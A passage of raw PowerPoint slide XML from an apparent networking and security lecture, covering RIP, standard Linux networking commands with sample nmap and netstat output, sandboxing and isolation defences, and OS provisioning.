            </a:lvl7pPr>
            <a:lvl8pPr marL="3200400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2000" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3657600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2000" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{8A90ADCF-45DD-7C41-AD6D-7911842CE198}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1476610" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04D7641E-BBFB-A74E-8E38-AB6EA0CB8869}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="226578"/>
            <a:ext cx="10342418" cy="757093"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Routing Information Protocol (RIP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1476611" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1266B24-22AF-1646-B97E-84395BD2C941}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720436" y="1814945"/>
            <a:ext cx="10709564" cy="4642617"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:norm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Distance vector protocol</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Nodes send distance vectors every 30 seconds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 or, when an update causes a change in routing</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Link costs in RIP</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All links have cost 1</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Valid distances of 1 through 15</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 with 16 representing infinity</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Small “infinity” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> smaller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> “counting to infinity” problem</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RIP is limited to fairly small networks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E.g., used in the Princeton campus network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12B1FE77-64F7-8D42-9145-549C07C02097}"/>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04870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68" y="138697"/>
            <a:ext cx="11870803" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Linux networking commands</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="307799" y="1524401"/>
            <a:ext cx="11582400" cy="5012323"/>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Many underlying network characteristics can be determined by Linux commands:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>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ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> - configure network interface parameters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traceroute - print the route packets take to network host (traceroute nis.nsf.net)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> - is an open source tool for network exploration and security auditing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nmap</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-T4</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scanme.nmap.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>           Nmap scan report for scanme.nmap.org (74.207.244.221)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>           Host is up (0.029s latency).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>           rDNS record for 74.207.244.221: li86-221.members.linode.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>           Not shown: 995 closed ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>           PORT     STATE    SERVICE     VERSION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>           22/tcp   open     ssh         OpenSSH 3ubuntu7 |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ssh-hostkey: 1024 8d:60:f1:7c:ca:b7:3d:0a:d6:67:54:9d:69:d9:b9:dd (DSA)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>           |_2048 79:f8:09:ac:d4:e2:32:42:10:49:d3:bd:20:82:85:ec (RSA)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>           80/tcp   open     http        Apache httpd 2.2.14 ((Ubuntu))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          </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64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="776211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08" y="175768"/>
            <a:ext cx="11796663" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Linux networking commands</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="500488" y="1816443"/>
            <a:ext cx="11191023" cy="4539908"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:body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More networking commands:</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nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> - query Internet domain name servers.</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telnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> - user interface to the TELNET protocol</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ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> is a program for logging into a remote machine and for executing commands on a remote </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>machine.  It is intended to provide secure encrypted communications between two untrusted hosts over an insecure network.</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netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> - displays the contents of various network-related data structures.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Active Internet connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Proto Recv-Q Send-Q  Local Address          Foreign Address        (state)    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tcp4       0      0  172.19.248.48.52040    17.249.28.34.5223      SYN_SENT   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tcp4       0      0  172.19.248.48.52039    www.unitedwifi.c.http  ESTABLISHED</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRP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wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> – packet capture on interface.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:endParaRPr lang="en-US" sz="2000"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65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="312658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53" y="151054"/>
            <a:ext cx="11874843" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Isolation and sandboxing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="474562" y="1856509"/>
            <a:ext cx="11262167" cy="4682404"/>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Malicious code may exploit vulnerabilities and “elevate privilege” (become root) ultimately installing persistent backdoors, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>How do we ensure that malicious code (like browser plug-ins) does not interfere with safety critical code?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>First, run malicious code as different user (account).  If the OS is secure, this would do it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>If process isolation is inadequate, we would run suspicious code in a sandbox (like Google’s plug-in sandbox) or better still in a hypervisor which isolates entire operating systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>We can employ system call interposition which monitors system calls and disables some access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>We can us “Berkeley jails” which makes only part of the file system hierarchy visible.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>We can modify programs using control flow tools like CFI.</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66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3039274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 y="113983"/>
            <a:ext cx="12105503" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Provisioning and configuration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="599715" y="1585384"/>
            <a:ext cx="11287485" cy="4663440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>When people or organizations first initialize their OS, they provision it with policy settings (e.g.- who can be root), password protections and cryptographic keys.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>They also install software, decide what services will run and which ports can be opened, which users can log in (by assigning accounts and passwords) as well as describing policies for network access (whitelisting or blacklisting IP addresses).  These provisioning steps are critical for subsequent security.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>How does this happen?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Historic model is that the “administrator” installs the OS, software and manually configures all this.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>More recently, machines are provisioned to trust an authority (by specifying the public key of the organization’s authority) and having the configuration done “over the air” upon first startup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Secure systems come with hardware that allows one to remotely verify the machines identity, exactly what software is running and configuration by using an Authenticated boot.  For example, Cloudproxy (see later slides).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67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2958145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Collecting data: packet sniffing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713014" y="1804085"/>
            <a:ext cx="11108871" cy="4552265"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
